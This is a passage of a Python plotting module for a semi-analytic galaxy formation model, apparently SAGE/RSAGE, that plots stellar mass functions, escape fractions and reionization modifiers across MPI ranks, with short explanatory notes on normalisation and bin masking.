The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
ResolutionLimit_mean : array of floats with the same shape as SMF.
This is the mean stellar mass for a halo with len (number of N-body simulation particles) between 'stellar_mass_halolen_lower' and 'stellar_mass_halolen_upper'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
observations : int
Denotes whether we want to overplot observational results.
0 : Don't plot anything.
1 : Plot Song et al. (2016) at z = 6, 7, 8.
2 : Plot Baldry et al. (2008) at z = 0.1.
3 : Plot both of these.
paper_plot : int
Denotes whether we want to split the plotting over three panels (z = 6, 7, 8) for the paper or keep it all to one figure.
output_tag : string
Name of the file that will be generated. File will be saved in the current directory with the output format defined by the 'output_format' variable at the beginning of the file.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Stellar Mass is in units of log10(Msun).
'''
## Empty array initialization ##
title = []
normalization_array = []
redshift_labels = []
counts_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
counts_array.append([])
bin_middle_array.append([])
redshift_labels.append([])
####
for model_number in range(0, len(SnapList)): # Does this for each of the models.
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
print("We are creating the stellar mass function using {0:.4f} of the box's volume.".format(box_factor))
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * bin_width * box_factor
normalization_array.append(norm)
####
for snapshot_idx in range(0, len(SnapList[model_number])): # Loops for each snapshot in each model.
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]) # Assigns a redshift label.
redshift_labels[model_number].append(tmp)
## We perform the plotting on Rank 0 so only this rank requires the final counts array. ##
if rank == 0:
counts_total = np.zeros_like(SMF[model_number][snapshot_idx])
else:
counts_total = None
comm.Reduce([SMF[model_number][snapshot_idx], MPI.FLOAT], [counts_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
if rank == 0:
counts_array[model_number].append(counts_total)
bin_middle_array[model_number].append(np.arange(m_gal_low, m_gal_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
####
## Plotting ##
if rank == 0: # Plot only on rank 0.
if paper_plot == 0:
f = plt.figure()
ax = plt.subplot(111)
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0: # We assume the redshifts for each model are the same; we only want one legend label per redshift.
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
plt.plot(bin_middle_array[model_number][snapshot_idx], counts_array[model_number][snapshot_idx] / normalization_array[model_number], color = PlotScripts.colors[snapshot_idx], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
#print(np.min(np.log10(ResolutionLimit_mean)))
#ax.axvline(np.max(np.log10(ResolutionLimit_mean)), color = 'k', linewidth = PlotScripts.global_linewidth, linestyle = '--')
#ax.text(np.max(np.log10(ResolutionLimit_mean)) + 0.1, 1e-3, "Resolution Limit", color = 'k')
for model_number in range(0, len(SnapList)): # Place legend labels for each of the models. NOTE: Placed after previous loop for proper formatting of labels.
plt.plot(1e100, 1e100, color = 'k', linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], rasterized=True, linewidth = PlotScripts.global_linewidth)
## Adjusting axis labels/limits. ##
plt.yscale('log', nonposy='clip')
plt.axis([6, 11.5, 1e-6, 1e-0])
ax.set_xlabel(r'$\log_{10}\ m_{\mathrm{*}} \:[M_{\odot}]$', fontsize = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]$', fontsize = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.25))
ax.set_xticks(np.arange(6.0, 12.0))
if (observations == 1 or observations == 3): # If we wanted to plot Song.
Obs.Get_Data_SMF()
delta = 0.05
caps = 5
## Song (2016) Plotting ##
plt.errorbar(Obs.Song_SMF_z6[:,0], 10**Obs.Song_SMF_z6[:,1], yerr= (10**Obs.Song_SMF_z6[:,1] - 10**Obs.Song_SMF_z6[:,3], 10**Obs.Song_SMF_z6[:,2] - 10**Obs.Song_SMF_z6[:,1]), xerr = 0.25, capsize = caps, elinewidth = PlotScripts.global_errorwidth, alpha = 1.0, lw=2.0, marker='o', ls='none', label = 'Song 2016, z = 6', color = PlotScripts.colors[0], rasterized=True)
plt.errorbar(Obs.Song_SMF_z7[:,0], 10**Obs.Song_SMF_z7[:,1], yerr= (10**Obs.Song_SMF_z7[:,1] - 10**Obs.Song_SMF_z7[:,3], 10**Obs.Song_SMF_z7[:,2] - 10**Obs.Song_SMF_z7[:,1]), xerr = 0.25, capsize = caps, alpha=0.75, elinewidth = PlotScripts.global_errorwidth, lw=1.0, marker='o', ls='none', label = 'Song 2016, z = 7', color = PlotScripts.colors[1], rasterized=True)
plt.errorbar(Obs.Song_SMF_z8[:,0], 10**Obs.Song_SMF_z8[:,1], yerr= (10**Obs.Song_SMF_z8[:,1] - 10**Obs.Song_SMF_z8[:,3], 10**Obs.Song_SMF_z8[:,2] - 10**Obs.Song_SMF_z8[:,1]), xerr = 0.25, capsize = caps, alpha=0.75, elinewidth = PlotScripts.global_errorwidth, lw=1.0, marker='o', ls='none', label = 'Song 2016, z = 8', color = PlotScripts.colors[2], rasterized=True)
####
if ((observations == 2 or observations == 3) and rank == 0): # If we wanted to plot Baldry.
Baldry_xval = np.log10(10 ** Obs.Baldry_SMF_z0[:, 0] /AllVars.Hubble_h/AllVars.Hubble_h)
Baldry_xval = Baldry_xval - 0.26 # convert back to Chabrier IMF
Baldry_yvalU = (Obs.Baldry_SMF_z0[:, 1]+Obs.Baldry_SMF_z0[:, 2]) * AllVars.Hubble_h*AllVars.Hubble_h*AllVars.Hubble_h
Baldry_yvalL = (Obs.Baldry_SMF_z0[:, 1]-Obs.Baldry_SMF_z0[:, 2]) * AllVars.Hubble_h*AllVars.Hubble_h*AllVars.Hubble_h
plt.fill_between(Baldry_xval, Baldry_yvalU, Baldry_yvalL,
facecolor='purple', alpha=0.25, label='Baldry et al. 2008 (z=0.1)')
####
leg = plt.legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = './%s%s' %(output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
if (paper_plot == 1):
fig, ax = plt.subplots(nrows=1, ncols=3, sharex=False, sharey=True, figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
for model_number in range(0, len(SnapList)):
for count in range(len(SnapList[model_number])):
w = np.where((counts_array[model_number][count] > 0))[0]
ax[count].plot(bin_middle_array[model_number][count][w], counts_array[model_number][count][w]
/ normalization_array[model_number], color = PlotScripts.colors[model_number],
linestyle = PlotScripts.linestyles[model_number], rasterized = True,
label = r"$\mathbf{SAGE}$", linewidth = PlotScripts.global_linewidth)
tick_locs = np.arange(6.0, 12.0)
ax[count].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs], fontsize = PlotScripts.global_fontsize)
ax[count].set_xlim([6.8, 10.3])
ax[count].tick_params(which = 'both', direction='in',
width = PlotScripts.global_tickwidth)
ax[count].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[count].tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
ax[count].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
fontsize = PlotScripts.global_labelsize - delta_fontsize)
ax[count].xaxis.set_minor_locator(plt.MultipleLocator(0.25))
#ax[count].set_xticks(np.arange(6.0, 12.0))
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[count].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
# Since y-axis is shared, only need to do this once.
ax[0].set_yscale('log', nonposy='clip')
ax[0].set_yticklabels([r"$\mathbf{10^{-5}}$",r"$\mathbf{10^{-5}}$",r"$\mathbf{10^{-4}}$", r"$\mathbf{10^{-3}}$",
r"$\mathbf{10^{-2}}$",r"$\mathbf{10^{-1}}$"])
ax[0].set_ylim([1e-5, 1e-1])
#ax[0].set_ylabel(r'\mathbf{$\log_{10} \Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]}$',
ax[0].set_ylabel(r'$\mathbf{log_{10} \: \Phi\ [Mpc^{-3}\: dex^{-1}]}$',
fontsize = PlotScripts.global_labelsize - delta_fontsize)
Obs.Get_Data_SMF()
PlotScripts.Plot_SMF_z6(ax[0], errorwidth=ewidth, capsize=caps)
PlotScripts.Plot_SMF_z7(ax[1], errorwidth=ewidth, capsize=caps)
PlotScripts.Plot_SMF_z8(ax[2], errorwidth=ewidth, capsize=caps)
####
ax[0].text(0.7, 0.9, r"$\mathbf{z = 6}$", transform = ax[0].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
ax[1].text(0.7, 0.9, r"$\mathbf{z = 7}$", transform = ax[1].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
ax[2].text(0.7, 0.9, r"$\mathbf{z = 8}$", transform = ax[2].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
#leg = ax[0,0].legend(loc=2, bbox_to_anchor = (0.2, -0.5), numpoints=1, labelspacing=0.1)
leg = ax[0].legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize - 2)
plt.tight_layout()
outputFile = "{0}_paper{1}".format(output_tag, output_format)
plt.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close()
##
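The SMF normalisation used in `StellarMassFunction` above (comoving volume times bin width, scaled by the fraction of files read) can be sketched in isolation as follows (illustrative only; the function names here are not part of this module):

```python
def smf_normalisation(box_size, hubble_h, bin_width, first_file, last_file, num_files):
    """Normalisation that turns raw counts into Phi [Mpc^-3 dex^-1].

    box_size is in Mpc/h; dividing by hubble_h**3 gives the volume in Mpc^3.
    box_factor scales a sub-volume (files [first_file, last_file] of
    num_files total) up to the full box.
    """
    box_factor = (last_file - first_file + 1.0) / num_files
    volume = (box_size / hubble_h) ** 3
    return volume * bin_width * box_factor

def smf(counts, norm):
    """Number density per bin: counts divided by the normalisation."""
    return [c / norm for c in counts]
```

For a 100 Mpc/h box with h = 1, 0.1 dex bins and all 10 files read, the normalisation is 1e6 * 0.1 = 1e5 Mpc^3 dex, so 10 galaxies in a bin give Phi = 1e-4 Mpc^-3 dex^-1.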
def plot_fesc_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc,
mean_halo_fesc, std_halo_fesc, N_halo_fesc,
ResolutionLimit_mean, model_tags, paper_plots,
mass_global, fesc_global, Ngamma_global, output_tag):
"""
Plots the escape fraction as a function of stellar/halo mass.
Parallel compatible.
Accepts 3D arrays of the escape fraction binned into Stellar Mass bins to plot the escape fraction for multiple models.
Mass units are log(Msun)
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc : Nested 3-dimensional array, mean_galaxy_fesc[model_number0][snapshot0] = [bin0_meanfesc, ..., binN_meanfesc], with length equal to the number of models.
Mean/Standard deviation for fesc in each stellar mass bin, for each [model_number] and [snapshot_number]. N_galaxy_fesc is the number of galaxies placed into each mass bin.
mean_halo_fesc, std_halo_fesc, N_halo_fesc : Nested 3-dimensional array, mean_halo_fesc[model_number0][snapshot0] = [bin0_meanfesc, ..., binN_meanfesc], with length equal to the number of models.
Identical to previous except using the halo virial mass for the binning rather than stellar mass.
ResolutionLimit_mean : array of floats with the same shape as mean_galaxy_fesc.
This is the mean stellar mass for a halo with len (number of N-body simulation particles) between 'stellar_mass_halolen_lower' and 'stellar_mass_halolen_upper'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
"""
def adjust_stellarmass_plot(ax):
#ax.axhline(0.20, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(7.8, 0.22, r"$f_\mathrm{esc, base}$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([6.8, 10])
ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
tick_locs = np.arange(0.0, 0.80, 0.10)
ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_paper_plots(ax, model_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle f_{esc}\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 0.68])
ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(model_tags[count])
label = model_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
tick_locs = np.arange(-0.1, 0.80, 0.10)
ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
print("x")
labels = ax[1,0].xaxis.get_ticklabels()
locs = ax[1,0].xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("y")
labels = ax[1,0].yaxis.get_ticklabels()
locs = ax[1,0].yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("Plotting fesc as a function of stellar mass.")
## Array initialization ##
master_mean_fesc_stellar, master_std_fesc_stellar, master_N_fesc_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_fesc, std_galaxy_fesc, N_galaxy_fesc,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
fig2, ax2 = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
count_x = 0
for count, model_number in enumerate(range(0, len(SnapList))):
if count == 2:
count_x += 1
print("There were a total of {0} galaxies over the entire redshift range.".format(sum(N_halo_fesc[model_number])))
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_fesc_stellar[model_number][snapshot_idx] < 4))[0] # Mask bins with fewer than 4 galaxies; too few to give a reliable mean.
master_mean_fesc_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
print(master_mean_fesc_stellar[model_number][snapshot_idx])
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_fesc_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_fesc_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[0],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
#w = np.random.randint(0,
# len(mass_global[model_number][snapshot_idx][0]),
# size=500)
#sc = ax2[count_x, count%2].scatter(mass_global[model_number][snapshot_idx][0][w],
# fesc_global[model_number][snapshot_idx][0][w],
# c=np.log10(Ngamma_global[model_number][snapshot_idx][0][w]*1.0e50),
# alpha = 0.5,cmap='plasma')
#plt.colorbar(sc)
#ax2[count_x, count%2].hexbin(mass_global[model_number][snapshot_idx],
# fesc_global[model_number][snapshot_idx],
# C=Ngamma_global[model_number][snapshot_idx])
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, model_tags)
leg = ax[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
#leg = ax2[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
#leg.draw_frame(False) # Don't want a box frame
#for t in leg.get_texts(): # Reduce the size of the text
# t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = './%s%s' %(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
if paper_plots == 1:
outputFile = './%s_scatter%s' %(output_tag, output_format)
fig2.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig2)
##
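The sparse-bin masking used in the plotting routines above (bins with fewer than 4 galaxies are set to NaN so matplotlib skips them) can be sketched as a standalone helper (illustrative only; `mask_sparse_bins` is not part of this module):

```python
import numpy as np

def mask_sparse_bins(mean_in_bin, N_in_bin, min_count=4):
    """Replace the mean in sparsely populated bins with NaN.

    NaN values create gaps in a matplotlib line plot, so bins with too
    few galaxies are simply not drawn rather than plotted as noise.
    """
    mean_in_bin = np.array(mean_in_bin, dtype=np.float64)  # Copy; do not mutate the input.
    sparse = np.asarray(N_in_bin) < min_count
    mean_in_bin[sparse] = np.nan
    return mean_in_bin
```

This mirrors the `np.where(N < 4)` followed by `[...] = np.nan` pattern used for both the escape-fraction and reionization-modifier plots.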
def plot_reionmod_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_reionmod, std_galaxy_reionmod, N_galaxy_reionmod,
mean_galaxy_reionmod_gnedin, std_galaxy_reionmod_gnedin,
model_tags, paper_plots, output_tag):
"""
"""
def adjust_paper_plots(ax, model_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 1.05])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(model_tags[count])
label = model_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(-0.1, 0.80, 0.10)
#ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
#fontsize = PlotScripts.global_fontsize)
#ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
def adjust_redshift_panels(ax, redshift_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax[1,0].set_ylabel(r'$\mathbf{\langle ReionMod\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([0.00, 1.05])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax[x,y].tick_params(which = 'minor',
length = PlotScripts.global_ticklength - 2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
label = redshift_tags[count]
ax[x,y].text(0.05, 0.65, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
print("Reionization Modifier as a function of stellar mass.")
## Array initialization ##
master_mean_reionmod_stellar, master_std_reionmod_stellar, master_N_reionmod_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_reionmod, std_galaxy_reionmod, N_galaxy_reionmod,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_reionmod_gnedin_stellar, master_std_reionmod_gnedin_stellar, master_N_reionmod_gnedin_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_reionmod_gnedin, std_galaxy_reionmod_gnedin, N_galaxy_reionmod,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
fig2, ax2 = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
count_x = 0
for count, model_number in enumerate(range(0, len(SnapList))):
if count == 2:
count_x += 1
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_reionmod_stellar[model_number][snapshot_idx] < 4))[0] # Mask bins with fewer than 4 galaxies; too few to give a reliable mean.
master_mean_reionmod_stellar[model_number][snapshot_idx][w] = np.nan
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[0],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[1],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
z_labels = []
for model_number in range(0, len(SnapList)):
count_x = 0
plot_count = 0
for count, snapshot_idx in enumerate(range(len(SnapList[model_number]))):
if count == 2:
count_x += 1
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
label = model_tags[model_number]
if (model_number == 0):
z_label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
z_labels.append(z_label)
## Plots as a function of stellar mass ##
